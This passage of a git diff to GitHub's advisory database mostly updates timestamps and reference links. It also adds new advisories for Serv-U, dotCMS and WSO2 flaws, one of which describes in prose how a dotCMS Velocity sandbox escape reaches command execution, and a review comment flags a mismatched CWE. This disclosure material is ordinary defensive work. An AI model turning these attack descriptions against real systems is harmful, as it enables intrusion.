 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2025/10/GHSA-fwc5-xhrg-wx5f/GHSA-fwc5-xhrg-wx5f.json b/advisories/unreviewed/2025/10/GHSA-fwc5-xhrg-wx5f/GHSA-fwc5-xhrg-wx5f.json
index 633fc0e3bfb99..7fbb20d912b4e 100644
--- a/advisories/unreviewed/2025/10/GHSA-fwc5-xhrg-wx5f/GHSA-fwc5-xhrg-wx5f.json
+++ b/advisories/unreviewed/2025/10/GHSA-fwc5-xhrg-wx5f/GHSA-fwc5-xhrg-wx5f.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-fwc5-xhrg-wx5f",
- "modified": "2025-10-27T15:30:42Z",
+ "modified": "2026-02-24T09:31:15Z",
 "published": "2025-10-27T15:30:42Z",
 "aliases": [
 "CVE-2025-12286"
@@ -38,6 +38,10 @@
 {
 "type": "WEB",
 "url": "https://vuldb.com/?submit.672512"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.682569"
 }
 ],
 "database_specific": {
diff --git a/advisories/unreviewed/2025/10/GHSA-w337-wphv-g4vh/GHSA-w337-wphv-g4vh.json b/advisories/unreviewed/2025/10/GHSA-w337-wphv-g4vh/GHSA-w337-wphv-g4vh.json
index aa90040aff914..0af14cd38869c 100644
--- a/advisories/unreviewed/2025/10/GHSA-w337-wphv-g4vh/GHSA-w337-wphv-g4vh.json
+++ b/advisories/unreviewed/2025/10/GHSA-w337-wphv-g4vh/GHSA-w337-wphv-g4vh.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-w337-wphv-g4vh",
- "modified": "2025-10-08T00:31:08Z",
+ "modified": "2026-02-24T09:31:13Z",
 "published": "2025-10-08T00:31:07Z",
 "aliases": [
 "CVE-2025-11413"
@@ -51,6 +51,10 @@
 "type": "WEB",
 "url": "https://vuldb.com/?submit.665587"
 },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.665590"
+ },
 {
 "type": "WEB",
 "url": "https://www.gnu.org"
diff --git a/advisories/unreviewed/2025/10/GHSA-wmcg-whfp-429v/GHSA-wmcg-whfp-429v.json b/advisories/unreviewed/2025/10/GHSA-wmcg-whfp-429v/GHSA-wmcg-whfp-429v.json
index 4e5791c6040d0..efcd3af046fae 100644
--- a/advisories/unreviewed/2025/10/GHSA-wmcg-whfp-429v/GHSA-wmcg-whfp-429v.json
+++ b/advisories/unreviewed/2025/10/GHSA-wmcg-whfp-429v/GHSA-wmcg-whfp-429v.json
@@ -1,7 +1,7 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-wmcg-whfp-429v",
- "modified": "2025-10-19T21:30:24Z",
+ "modified": "2026-02-24T09:31:14Z",
 "published": "2025-10-19T21:30:24Z",
 "aliases": [
 "CVE-2025-11944"
@@ -35,6 +35,10 @@ "type": "WEB", "url": "https://github.com/givanz/Vvveb/commit/52204b4a106b2fb02d16eee06a88a1f2697f9b35" }, + { + "type": "WEB", + "url": "https://github.com/givanz/Vvveb" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.329024" diff --git a/advisories/unreviewed/2025/11/GHSA-462x-7r4x-p5hx/GHSA-462x-7r4x-p5hx.json b/advisories/unreviewed/2025/11/GHSA-462x-7r4x-p5hx/GHSA-462x-7r4x-p5hx.json index d65afe658a332..e203fa7433472 100644 --- a/advisories/unreviewed/2025/11/GHSA-462x-7r4x-p5hx/GHSA-462x-7r4x-p5hx.json +++ b/advisories/unreviewed/2025/11/GHSA-462x-7r4x-p5hx/GHSA-462x-7r4x-p5hx.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-462x-7r4x-p5hx", - "modified": "2025-11-16T03:30:25Z", + "modified": "2026-02-24T09:31:16Z", "published": "2025-11-16T03:30:25Z", "aliases": [ "CVE-2025-13232" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/projectsend/projectsend/commit/334da1ea39cb12f6b6e98dd2f80bb033e0c7b845" }, + { + "type": "WEB", + "url": "https://github.com/projectsend/projectsend" + }, { "type": "WEB", "url": "https://github.com/projectsend/projectsend/releases/tag/r1945" diff --git a/advisories/unreviewed/2025/11/GHSA-5pqw-p5hq-5f98/GHSA-5pqw-p5hq-5f98.json b/advisories/unreviewed/2025/11/GHSA-5pqw-p5hq-5f98/GHSA-5pqw-p5hq-5f98.json index 5b2aa02ae0994..c4d349034cc63 100644 --- a/advisories/unreviewed/2025/11/GHSA-5pqw-p5hq-5f98/GHSA-5pqw-p5hq-5f98.json +++ b/advisories/unreviewed/2025/11/GHSA-5pqw-p5hq-5f98/GHSA-5pqw-p5hq-5f98.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-5pqw-p5hq-5f98", - "modified": "2025-11-12T21:31:08Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-12T21:31:08Z", "aliases": [ "CVE-2025-13058" @@ -31,6 +31,10 @@ "type": "WEB", "url": "https://github.com/soerennb/extplorer/commit/002def70b985f7012586df2c44368845bf405ab3" }, + { + "type": "WEB", + "url": "https://github.com/soerennb/extplorer" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.332185" 
diff --git a/advisories/unreviewed/2025/11/GHSA-6764-r2xh-qmhg/GHSA-6764-r2xh-qmhg.json b/advisories/unreviewed/2025/11/GHSA-6764-r2xh-qmhg/GHSA-6764-r2xh-qmhg.json index b18300ea89a07..a0cb546b9ccef 100644 --- a/advisories/unreviewed/2025/11/GHSA-6764-r2xh-qmhg/GHSA-6764-r2xh-qmhg.json +++ b/advisories/unreviewed/2025/11/GHSA-6764-r2xh-qmhg/GHSA-6764-r2xh-qmhg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-6764-r2xh-qmhg", - "modified": "2025-11-14T18:31:39Z", + "modified": "2026-02-24T09:31:16Z", "published": "2025-11-14T18:31:39Z", "aliases": [ "CVE-2025-13170" @@ -42,6 +42,14 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.684617" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.685870" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.698602" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/11/GHSA-69hw-6qrh-77rw/GHSA-69hw-6qrh-77rw.json b/advisories/unreviewed/2025/11/GHSA-69hw-6qrh-77rw/GHSA-69hw-6qrh-77rw.json index c15f17511183a..0f540cf4087e2 100644 --- a/advisories/unreviewed/2025/11/GHSA-69hw-6qrh-77rw/GHSA-69hw-6qrh-77rw.json +++ b/advisories/unreviewed/2025/11/GHSA-69hw-6qrh-77rw/GHSA-69hw-6qrh-77rw.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-69hw-6qrh-77rw", - "modified": "2025-11-17T06:30:14Z", + "modified": "2026-02-24T09:31:16Z", "published": "2025-11-17T06:30:14Z", "aliases": [ "CVE-2025-13260" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.689268" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.724933" + }, { "type": "WEB", "url": "https://www.campcodes.com" diff --git a/advisories/unreviewed/2025/11/GHSA-9m86-pmxw-268g/GHSA-9m86-pmxw-268g.json b/advisories/unreviewed/2025/11/GHSA-9m86-pmxw-268g/GHSA-9m86-pmxw-268g.json index 51bbf70cd773e..579d339735ec7 100644 --- a/advisories/unreviewed/2025/11/GHSA-9m86-pmxw-268g/GHSA-9m86-pmxw-268g.json +++ b/advisories/unreviewed/2025/11/GHSA-9m86-pmxw-268g/GHSA-9m86-pmxw-268g.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9m86-pmxw-268g", - "modified": "2025-11-07T18:30:30Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-07T18:30:30Z", "aliases": [ "CVE-2025-12862" @@ -38,6 +38,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.679802" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.748850" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/11/GHSA-c9jg-5vh8-ff2v/GHSA-c9jg-5vh8-ff2v.json b/advisories/unreviewed/2025/11/GHSA-c9jg-5vh8-ff2v/GHSA-c9jg-5vh8-ff2v.json index 2ba15752b5a88..61c5a9c5a290c 100644 --- a/advisories/unreviewed/2025/11/GHSA-c9jg-5vh8-ff2v/GHSA-c9jg-5vh8-ff2v.json +++ b/advisories/unreviewed/2025/11/GHSA-c9jg-5vh8-ff2v/GHSA-c9jg-5vh8-ff2v.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c9jg-5vh8-ff2v", - "modified": "2025-11-10T03:30:16Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-10T03:30:15Z", "aliases": [ "CVE-2025-12925" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/rymcu/forest/issues/199" }, + { + "type": "WEB", + "url": "https://github.com/rymcu/forest" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.331645" diff --git a/advisories/unreviewed/2025/11/GHSA-j383-q79v-268x/GHSA-j383-q79v-268x.json b/advisories/unreviewed/2025/11/GHSA-j383-q79v-268x/GHSA-j383-q79v-268x.json index 527f9fbb3d18f..2293dd921e9cc 100644 --- a/advisories/unreviewed/2025/11/GHSA-j383-q79v-268x/GHSA-j383-q79v-268x.json +++ b/advisories/unreviewed/2025/11/GHSA-j383-q79v-268x/GHSA-j383-q79v-268x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-j383-q79v-268x", - "modified": "2025-11-13T18:31:04Z", + "modified": "2026-02-24T09:31:16Z", "published": "2025-11-13T18:31:04Z", "aliases": [ "CVE-2025-13120" 
@@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/mruby/mruby/commit/eb398971bfb43c38db3e04528b68ac9a7ce509bc" }, + { + "type": "WEB", + "url": "https://github.com/mruby/mruby" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.332325" diff --git a/advisories/unreviewed/2025/11/GHSA-mfg3-2r9j-5hv9/GHSA-mfg3-2r9j-5hv9.json b/advisories/unreviewed/2025/11/GHSA-mfg3-2r9j-5hv9/GHSA-mfg3-2r9j-5hv9.json index 737c23b11b9eb..0e0d86bc0f4a1 100644 --- a/advisories/unreviewed/2025/11/GHSA-mfg3-2r9j-5hv9/GHSA-mfg3-2r9j-5hv9.json +++ b/advisories/unreviewed/2025/11/GHSA-mfg3-2r9j-5hv9/GHSA-mfg3-2r9j-5hv9.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-mfg3-2r9j-5hv9", - "modified": "2025-11-10T03:30:15Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-10T03:30:15Z", "aliases": [ "CVE-2025-12924" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/rymcu/forest/issues/198" }, + { + "type": "WEB", + "url": "https://github.com/rymcu/forest" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.331644" diff --git a/advisories/unreviewed/2025/11/GHSA-q269-xqww-45mm/GHSA-q269-xqww-45mm.json b/advisories/unreviewed/2025/11/GHSA-q269-xqww-45mm/GHSA-q269-xqww-45mm.json index e24cf02c3bad4..99198bc01e8f0 100644 --- a/advisories/unreviewed/2025/11/GHSA-q269-xqww-45mm/GHSA-q269-xqww-45mm.json +++ b/advisories/unreviewed/2025/11/GHSA-q269-xqww-45mm/GHSA-q269-xqww-45mm.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q269-xqww-45mm", - "modified": "2025-11-07T21:31:21Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-07T21:31:21Z", "aliases": [ "CVE-2025-12875" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/makesoftwaresafe/mruby/commit/93619f06dd378db6766666b30c08978311c7ec94" }, + { + "type": "WEB", + "url": "https://github.com/mruby/mruby" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.331511" 
diff --git a/advisories/unreviewed/2025/11/GHSA-q53m-jpj6-g58x/GHSA-q53m-jpj6-g58x.json b/advisories/unreviewed/2025/11/GHSA-q53m-jpj6-g58x/GHSA-q53m-jpj6-g58x.json index 6504a44093a3f..a043e43fa5562 100644 --- a/advisories/unreviewed/2025/11/GHSA-q53m-jpj6-g58x/GHSA-q53m-jpj6-g58x.json +++ b/advisories/unreviewed/2025/11/GHSA-q53m-jpj6-g58x/GHSA-q53m-jpj6-g58x.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q53m-jpj6-g58x", - "modified": "2025-11-17T03:30:26Z", + "modified": "2026-02-24T09:31:16Z", "published": "2025-11-17T03:30:26Z", "aliases": [ "CVE-2025-13259" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://vuldb.com/?submit.688780" }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.715808" + }, { "type": "WEB", "url": "https://www.campcodes.com" diff --git a/advisories/unreviewed/2025/11/GHSA-vwmr-4hph-3f4r/GHSA-vwmr-4hph-3f4r.json b/advisories/unreviewed/2025/11/GHSA-vwmr-4hph-3f4r/GHSA-vwmr-4hph-3f4r.json index 1e06739e85406..b8c4d3240cbb0 100644 --- a/advisories/unreviewed/2025/11/GHSA-vwmr-4hph-3f4r/GHSA-vwmr-4hph-3f4r.json +++ b/advisories/unreviewed/2025/11/GHSA-vwmr-4hph-3f4r/GHSA-vwmr-4hph-3f4r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-vwmr-4hph-3f4r", - "modified": "2025-11-03T03:30:25Z", + "modified": "2026-02-24T09:31:15Z", "published": "2025-11-03T03:30:25Z", "aliases": [ "CVE-2025-12610" @@ -42,6 +42,10 @@ { "type": "WEB", "url": "https://vuldb.com/?submit.678450" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.683064" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/12/GHSA-229x-w52j-6f5m/GHSA-229x-w52j-6f5m.json b/advisories/unreviewed/2025/12/GHSA-229x-w52j-6f5m/GHSA-229x-w52j-6f5m.json index 7e91138064abd..c7e07d1d858ce 100644 --- a/advisories/unreviewed/2025/12/GHSA-229x-w52j-6f5m/GHSA-229x-w52j-6f5m.json +++ b/advisories/unreviewed/2025/12/GHSA-229x-w52j-6f5m/GHSA-229x-w52j-6f5m.json 
@@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-229x-w52j-6f5m", - "modified": "2025-12-29T09:30:23Z", + "modified": "2026-02-24T09:31:19Z", "published": "2025-12-29T09:30:23Z", "aliases": [ "CVE-2025-15176" @@ -39,6 +39,10 @@ "type": "WEB", "url": "https://github.com/open5gs/open5gs/commit/b72d8349980076e2c033c8324f07747a86eea4f8" }, + { + "type": "WEB", + "url": "https://github.com/open5gs/open5gs" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.338561" diff --git a/advisories/unreviewed/2025/12/GHSA-9492-pwhm-prgg/GHSA-9492-pwhm-prgg.json b/advisories/unreviewed/2025/12/GHSA-9492-pwhm-prgg/GHSA-9492-pwhm-prgg.json index 87c2cb0100087..d00a14c4b06fe 100644 --- a/advisories/unreviewed/2025/12/GHSA-9492-pwhm-prgg/GHSA-9492-pwhm-prgg.json +++ b/advisories/unreviewed/2025/12/GHSA-9492-pwhm-prgg/GHSA-9492-pwhm-prgg.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-9492-pwhm-prgg", - "modified": "2025-12-26T03:30:14Z", + "modified": "2026-02-24T09:31:18Z", "published": "2025-12-26T03:30:14Z", "aliases": [ "CVE-2025-15093" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/sunkaifei/FlyCms/issues/15" }, + { + "type": "WEB", + "url": "https://github.com/sunkaifei/FlyCms" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.338422" diff --git a/advisories/unreviewed/2025/12/GHSA-f342-w736-j52r/GHSA-f342-w736-j52r.json b/advisories/unreviewed/2025/12/GHSA-f342-w736-j52r/GHSA-f342-w736-j52r.json index 9f47a641eb028..b73f00c219360 100644 --- a/advisories/unreviewed/2025/12/GHSA-f342-w736-j52r/GHSA-f342-w736-j52r.json +++ b/advisories/unreviewed/2025/12/GHSA-f342-w736-j52r/GHSA-f342-w736-j52r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-f342-w736-j52r", - "modified": "2025-12-27T21:30:12Z", + "modified": "2026-02-24T09:31:18Z", "published": "2025-12-27T21:30:12Z", "aliases": [ "CVE-2025-15109" 
@@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15109" }, + { + "type": "WEB", + "url": "https://gitee.com/jackq/XCMS" + }, { "type": "WEB", "url": "https://gitee.com/jackq/XCMS/issues/IDC4ZT" diff --git a/advisories/unreviewed/2025/12/GHSA-hg49-2rqm-p9hf/GHSA-hg49-2rqm-p9hf.json b/advisories/unreviewed/2025/12/GHSA-hg49-2rqm-p9hf/GHSA-hg49-2rqm-p9hf.json index 1a7f118308cb6..6ba526ac666bd 100644 --- a/advisories/unreviewed/2025/12/GHSA-hg49-2rqm-p9hf/GHSA-hg49-2rqm-p9hf.json +++ b/advisories/unreviewed/2025/12/GHSA-hg49-2rqm-p9hf/GHSA-hg49-2rqm-p9hf.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-hg49-2rqm-p9hf", - "modified": "2025-12-26T03:30:15Z", + "modified": "2026-02-24T09:31:18Z", "published": "2025-12-26T03:30:15Z", "aliases": [ "CVE-2025-15094" @@ -27,6 +27,10 @@ "type": "WEB", "url": "https://github.com/sunkaifei/FlyCms/issues/16" }, + { + "type": "WEB", + "url": "https://github.com/sunkaifei/FlyCms" + }, { "type": "WEB", "url": "https://vuldb.com/?ctiid.338423" diff --git a/advisories/unreviewed/2025/12/GHSA-w2jm-qqhw-c9px/GHSA-w2jm-qqhw-c9px.json b/advisories/unreviewed/2025/12/GHSA-w2jm-qqhw-c9px/GHSA-w2jm-qqhw-c9px.json index 540b015719140..a2ac287b3f6d2 100644 --- a/advisories/unreviewed/2025/12/GHSA-w2jm-qqhw-c9px/GHSA-w2jm-qqhw-c9px.json +++ b/advisories/unreviewed/2025/12/GHSA-w2jm-qqhw-c9px/GHSA-w2jm-qqhw-c9px.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w2jm-qqhw-c9px", - "modified": "2025-12-27T21:30:12Z", + "modified": "2026-02-24T09:31:18Z", "published": "2025-12-27T21:30:12Z", "aliases": [ "CVE-2025-15110" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15110" }, + { + "type": "WEB", + "url": "https://gitee.com/jackq/XCMS" + }, { "type": "WEB", "url": "https://gitee.com/jackq/XCMS/issues/IDC5C8" 
diff --git a/advisories/unreviewed/2025/12/GHSA-w944-w7q2-5fv6/GHSA-w944-w7q2-5fv6.json b/advisories/unreviewed/2025/12/GHSA-w944-w7q2-5fv6/GHSA-w944-w7q2-5fv6.json index 70a013740616f..5b46dbe5ad5b9 100644 --- a/advisories/unreviewed/2025/12/GHSA-w944-w7q2-5fv6/GHSA-w944-w7q2-5fv6.json +++ b/advisories/unreviewed/2025/12/GHSA-w944-w7q2-5fv6/GHSA-w944-w7q2-5fv6.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-w944-w7q2-5fv6", - "modified": "2025-12-30T12:30:29Z", + "modified": "2026-02-24T09:31:20Z", "published": "2025-12-30T12:30:29Z", "aliases": [ "CVE-2025-15246" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15246" }, + { + "type": "WEB", + "url": "https://gitee.com/aizuda/snail-job" + }, { "type": "WEB", "url": "https://gitee.com/aizuda/snail-job/issues/ICQV61" diff --git a/advisories/unreviewed/2025/12/GHSA-xh4m-g9pq-wh25/GHSA-xh4m-g9pq-wh25.json b/advisories/unreviewed/2025/12/GHSA-xh4m-g9pq-wh25/GHSA-xh4m-g9pq-wh25.json index aa1c013b5318a..9a0cd4023112f 100644 --- a/advisories/unreviewed/2025/12/GHSA-xh4m-g9pq-wh25/GHSA-xh4m-g9pq-wh25.json +++ b/advisories/unreviewed/2025/12/GHSA-xh4m-g9pq-wh25/GHSA-xh4m-g9pq-wh25.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xh4m-g9pq-wh25", - "modified": "2025-12-30T12:30:29Z", + "modified": "2026-02-24T09:31:20Z", "published": "2025-12-30T12:30:29Z", "aliases": [ "CVE-2025-15247" @@ -23,6 +23,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15247" }, + { + "type": "WEB", + "url": "https://gitee.com/gmg137/snap7-rs" + }, { "type": "WEB", "url": "https://gitee.com/gmg137/snap7-rs/issues/ID2H7V" diff --git a/advisories/unreviewed/2026/02/GHSA-8cmg-xf32-xmvr/GHSA-8cmg-xf32-xmvr.json b/advisories/unreviewed/2026/02/GHSA-8cmg-xf32-xmvr/GHSA-8cmg-xf32-xmvr.json new file mode 100644 index 0000000000000..1969863c8c520 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-8cmg-xf32-xmvr/GHSA-8cmg-xf32-xmvr.json 
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8cmg-xf32-xmvr", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2025-40540" + ], + "details": "A type confusion vulnerability exists in Serv-U which when exploited, gives a malicious actor the ability to execute arbitrary native code as privileged account.\n\nThis issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40540" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40540" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-704" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T08:16:28Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-hwvv-m8xc-26x2/GHSA-hwvv-m8xc-26x2.json b/advisories/unreviewed/2026/02/GHSA-hwvv-m8xc-26x2/GHSA-hwvv-m8xc-26x2.json new file mode 100644 index 0000000000000..a1e8811711eea --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-hwvv-m8xc-26x2/GHSA-hwvv-m8xc-26x2.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hwvv-m8xc-26x2", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2025-11165" + ], + "details": "A sandbox escape vulnerability exists in dotCMS’s Velocity scripting engine (VTools) that allows authenticated users with scripting privileges to bypass class and package restrictions enforced by SecureUberspectorImpl.\n\nBy dynamically modifying the Velocity engine’s runtime configuration and reinitializing its Uberspect, a malicious actor can remove the introspector.restrict.classes and introspector.restrict.packages protections.\n\nOnce these restrictions are cleared, the attacker can access arbitrary Java classes, including java.lang.Runtime, and execute arbitrary system commands under the privileges of the application process (e.g. dotCMS or Tomcat user).", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11165" + }, + { + "type": "WEB", + "url": "https://dev.dotcms.com/docs/known-security-issues?issueNumber=SI-74" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T09:16:12Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-jjx5-vcwr-cwfq/GHSA-jjx5-vcwr-cwfq.json b/advisories/unreviewed/2026/02/GHSA-jjx5-vcwr-cwfq/GHSA-jjx5-vcwr-cwfq.json new file mode 100644 index 0000000000000..04acc1226a8c8 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-jjx5-vcwr-cwfq/GHSA-jjx5-vcwr-cwfq.json 
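Review bot: The `cwe_ids` entry `"CWE-89"` (SQL injection) under `database_specific` does not match the `details` text, which describes a Velocity sandbox escape ending in arbitrary command execution and never mentions SQL. Anyone filtering or routing advisories by CWE will file GHSA-hwvv-m8xc-26x2 under the wrong weakness class. The value presumably comes from the upstream CVE record and should be confirmed there; a class such as `"CWE-94"` would fit the description as written. Because `"affected": []` matches no package, dotCMS deployments have to be tracked by CVE-2025-11165 rather than by dependency alerts.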
@@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jjx5-vcwr-cwfq", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2025-40539" + ], + "details": "A type confusion vulnerability exists in Serv-U which when exploited, gives a malicious actor the ability to execute arbitrary native code as privileged account.\n\nThis issue requires administrative privileges to abuse. On Windows deployments, the risk is scored as a medium because services frequently run under less-privileged service accounts by default.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-40539" + }, + { + "type": "WEB", + "url": "https://documentation.solarwinds.com/en/success_center/servu/content/release_notes/servu_15-5-4_release_notes.htm" + }, + { + "type": "WEB", + "url": "https://www.solarwinds.com/trust-center/security-advisories/CVE-2025-40539" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-704" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T08:16:27Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-p4xj-mrqw-g3f3/GHSA-p4xj-mrqw-g3f3.json b/advisories/unreviewed/2026/02/GHSA-p4xj-mrqw-g3f3/GHSA-p4xj-mrqw-g3f3.json new file mode 100644 index 0000000000000..83d2972e18856 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-p4xj-mrqw-g3f3/GHSA-p4xj-mrqw-g3f3.json 
@@ -0,0 +1,36 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-p4xj-mrqw-g3f3", + "modified": "2026-02-24T09:31:21Z", + "published": "2026-02-24T09:31:21Z", + "aliases": [ + "CVE-2024-1524" + ], + "details": "When the \"Silent Just-In-Time Provisioning\" feature is enabled for a federated identity provider (IDP) there is a risk that a local user store user's information may be replaced during the account provisioning process in cases where federated users share the same username as local users. \n\n There will be no impact on your deployment if any of the preconditions mentioned below are not met. Only when all the preconditions mentioned below are fulfilled could a malicious actor associate a targeted local user account with a federated IDP user account that they control.\n\nThe Deployment should have: \n-An IDP configured for federated authentication with Silent JIT provisioning enabled.\n\nThe malicious actor should have:\n-A fresh valid user account in the federated IDP that has not been used earlier.\n-Knowledge of the username of a valid user in the local IDP. \n-An account at the federated IDP matching the targeted local username.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:L" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1524" + }, + { + "type": "WEB", + "url": "https://security.docs.wso2.com/en/latest/security-announcements/security-advisories/2026/WSO2-2024-3144" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-290" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-24T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-vh45-gfxf-vr42/GHSA-vh45-gfxf-vr42.json b/advisories/unreviewed/2026/02/GHSA-vh45-gfxf-vr42/GHSA-vh45-gfxf-vr42.json new file mode 100644 index 0000000000000..5feb42b2b4594 --- /dev/null 
